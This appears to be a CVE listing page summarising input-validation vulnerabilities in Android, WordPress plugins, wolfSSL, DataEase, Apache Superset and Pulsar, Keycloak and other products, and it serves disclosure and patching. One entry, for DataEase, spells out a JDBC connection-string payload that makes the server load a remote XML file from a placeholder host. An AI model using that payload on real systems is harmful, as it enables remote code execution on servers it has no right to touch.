Total
10748 CVE
| CVE | Vendors | Products | Updated | CVSS v2 | CVSS v3 |
|---|---|---|---|---|---|
| CVE-2023-20976 | 1 Google | 1 Android | 2025-02-25 | N/A | 7.3 HIGH |
| In getConfirmationMessage of DefaultAutofillPicker.java, there is a possible way to mislead the user to select default autofill application due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-216117246 | |||||
| CVE-2023-20960 | 1 Google | 1 Android | 2025-02-25 | N/A | 8.8 HIGH |
| In launchDeepLinkIntentToRight of SettingsHomepageActivity.java, there is a possible way to launch arbitrary activities due to improper input validation. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12L Android-13Android ID: A-250589026 | |||||
| CVE-2024-52337 | 2025-02-25 | N/A | 5.5 MEDIUM | ||
| A log spoofing flaw was found in the Tuned package due to improper sanitization of some API arguments. This flaw allows an attacker to pass a controlled sequence of characters; newlines can be inserted into the log. Instead of the 'evil' the attacker could mimic a valid TuneD log line and trick the administrator. The quotes '' are usually used in TuneD logs citing raw user input, so there will always be the ' character ending the spoofed input, and the administrator can easily overlook this. This logged string is later used in logging and in the output of utilities, for example, `tuned-adm get_instances` or other third-party programs that use Tuned's D-Bus interface for such operations. | |||||
| CVE-2024-13798 | 2025-02-22 | N/A | 5.3 MEDIUM | ||
| The Post Grid and Gutenberg Blocks – ComboBlocks plugin for WordPress is vulnerable to unauthorized order creation in all versions up to, and including, 2.3.5. This is due to insufficient verification on form fields. This makes it possible for unauthenticated attackers to create new orders for products and mark them as paid without actually completing a payment. | |||||
| CVE-2023-6937 | 1 Wolfssl | 1 Wolfssl | 2025-02-21 | N/A | 5.3 MEDIUM |
| wolfSSL prior to 5.6.6 did not check that messages in one (D)TLS record do not span key boundaries. As a result, it was possible to combine (D)TLS messages using different keys into one (D)TLS record. The most extreme edge case is that, in (D)TLS 1.3, it was possible that an unencrypted (D)TLS 1.3 record from the server containing first a ServerHello message and then the rest of the first server flight would be accepted by a wolfSSL client. In (D)TLS 1.3 the handshake is encrypted after the ServerHello but a wolfSSL client would accept an unencrypted flight from the server. This does not compromise key negotiation and authentication so it is assigned a low severity rating. | |||||
| CVE-2024-13681 | 1 Undsgn | 1 Uncode | 2025-02-21 | N/A | 7.5 HIGH |
| The Uncode theme for WordPress is vulnerable to arbitrary file read due to insufficient input validation in the 'uncode_admin_get_oembed' function in all versions up to, and including, 2.9.1.6. This makes it possible for unauthenticated attackers to read arbitrary files on the server. | |||||
| CVE-2024-13691 | 1 Undsgn | 1 Uncode | 2025-02-21 | N/A | 6.5 MEDIUM |
| The Uncode theme for WordPress is vulnerable to arbitrary file read due to insufficient input validation in the 'uncode_recordMedia' function in all versions up to, and including, 2.9.1.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read arbitrary files on the server. | |||||
| CVE-2024-55952 | 1 Dataease | 1 Dataease | 2025-02-20 | N/A | 8.8 HIGH |
| DataEase is an open source business analytics tool. Authenticated users can remotely execute code through the backend JDBC connection. When constructing the jdbc connection string, the parameters are not filtered. Constructing the host as ip:5432/test/?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://ip:5432/1.xml&a= can trigger the ClassPathXmlApplicationContext construction method. The vulnerability has been fixed in v1.18.27. Users are advised to upgrade. There are no known workarounds for this vulnerability. | |||||
| CVE-2025-1177 | 1 Xunruicms | 1 Xunruicms | 2025-02-20 | 6.5 MEDIUM | 6.3 MEDIUM |
| A vulnerability was found in dayrui XunRuiCMS 4.6.3. It has been classified as critical. Affected is the function import_add of the file dayrui/Fcms/Control/Admin/Linkage.php. The manipulation leads to deserialization. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | |||||
| CVE-2022-48356 | 1 Huawei | 2 Emui, Harmonyos | 2025-02-19 | N/A | 7.5 HIGH |
| The facial recognition module has a vulnerability in input parameter verification. Successful exploitation of this vulnerability may cause failed facial recognition. | |||||
| CVE-2023-24304 | 1 Irfanview | 1 Irfanview | 2025-02-18 | N/A | 7.8 HIGH |
| Improper input validation in the PDF.dll plugin of IrfanView v4.60 allows attackers to execute arbitrary code via opening a crafted PDF file. | |||||
| CVE-2024-4028 | 2025-02-18 | N/A | 3.8 LOW | ||
| A vulnerability was found in Keycloak. This issue may allow a privileged attacker to use a malicious payload as the permission while creating items (Resource and Permissions) from the admin console, leading to a stored cross-site scripting (XSS) attack. | |||||
| CVE-2022-33209 | 1 Intel | 4 Lapbc510, Lapbc510 Firmware, Lapbc710 and 1 more | 2025-02-18 | N/A | 7.8 HIGH |
| Improper input validation in the firmware for some Intel(R) NUC Laptop Kits before version BC0076 may allow a privileged user to potentially enable escalation of privilege via local access. | |||||
| CVE-2025-0424 | 2025-02-18 | N/A | N/A | ||
| In the "bestinformed Web" application, some user input was not properly sanitized. This leads to multiple authenticated stored cross-site scripting vulnerabilities. An authenticated attacker is able to compromise the sessions of other users on the server by injecting JavaScript code into their session using an "Authenticated Stored Cross-Site Scripting". Those other users might have more privileges than the attacker, enabling a form of horizontal movement. | |||||
| CVE-2025-0423 | 2025-02-18 | N/A | N/A | ||
| In the "bestinformed Web" application, some user input was not properly sanitized. This leads to multiple unauthenticated stored cross-site scripting vulnerabilities. An unauthenticated attacker is able to compromise the sessions of users on the server by injecting JavaScript code into their session using an "Unauthenticated Stored Cross-Site Scripting". The attacker is then able to ride the session of those users and can abuse their privileges on the "bestinformed Web" application. | |||||
| CVE-2025-0422 | 2025-02-18 | N/A | N/A | ||
| An authenticated user in the "bestinformed Web" application can execute commands on the underlying server running the application. (Remote Code Execution) For this, the user must be able to create "ScriptVars" with the type „script" and preview them by, for example, creating a new "Info". By default, admin users have those permissions, but with the granular permission system, those permissions may be assigned to other users. An attacker is able to execute commands on the server running the "bestinformed Web" application if an account with the correct permissions was compromised before. | |||||
| CVE-2025-0178 | 2025-02-14 | N/A | N/A | ||
| Improper Input Validation vulnerability in WatchGuard Fireware OS allows an attacker to manipulate the value of the HTTP Host header in requests sent to the Web UI. An attacker could exploit this vulnerability to redirect users to malicious websites, poison the web cache, or inject malicious JavaScript into responses sent by the Web UI. This issue affects Fireware OS: from 12.0 up to and including 12.11. | |||||
| CVE-2024-34693 | 1 Apache | 1 Superset | 2025-02-13 | N/A | 6.8 MEDIUM |
| Improper Input Validation vulnerability in Apache Superset, allows for an authenticated attacker to create a MariaDB connection with local_infile enabled. If both the MariaDB server (off by default) and the local mysql client on the web server are set to allow for local infile, it's possible for the attacker to execute a specific MySQL/MariaDB SQL command that is able to read files from the server and insert their content on a MariaDB database table.This issue affects Apache Superset: before 3.1.3 and version 4.0.0 Users are recommended to upgrade to version 4.0.1 or 3.1.3, which fixes the issue. | |||||
| CVE-2024-27135 | 1 Apache | 1 Pulsar | 2025-02-13 | N/A | 8.5 HIGH |
| Improper input validation in the Pulsar Function Worker allows a malicious authenticated user to execute arbitrary Java code on the Pulsar Function worker, outside of the sandboxes designated for running user-provided functions. This vulnerability also applies to the Pulsar Broker when it is configured with "functionsWorkerEnabled=true". This issue affects Apache Pulsar versions from 2.4.0 to 2.10.5, from 2.11.0 to 2.11.3, from 3.0.0 to 3.0.2, from 3.1.0 to 3.1.2, and 3.2.0. 2.10 Pulsar Function Worker users should upgrade to at least 2.10.6. 2.11 Pulsar Function Worker users should upgrade to at least 2.11.4. 3.0 Pulsar Function Worker users should upgrade to at least 3.0.3. 3.1 Pulsar Function Worker users should upgrade to at least 3.1.3. 3.2 Pulsar Function Worker users should upgrade to at least 3.2.1. Users operating versions prior to those listed above should upgrade to the aforementioned patched versions or newer versions. | |||||
| CVE-2024-25583 | 2025-02-13 | N/A | 7.5 HIGH | ||
| A crafted response from an upstream server the recursor has been configured to forward-recurse to can cause a Denial of Service in the Recursor. The default configuration of the Recursor does not use recursive forwarding and is not affected. | |||||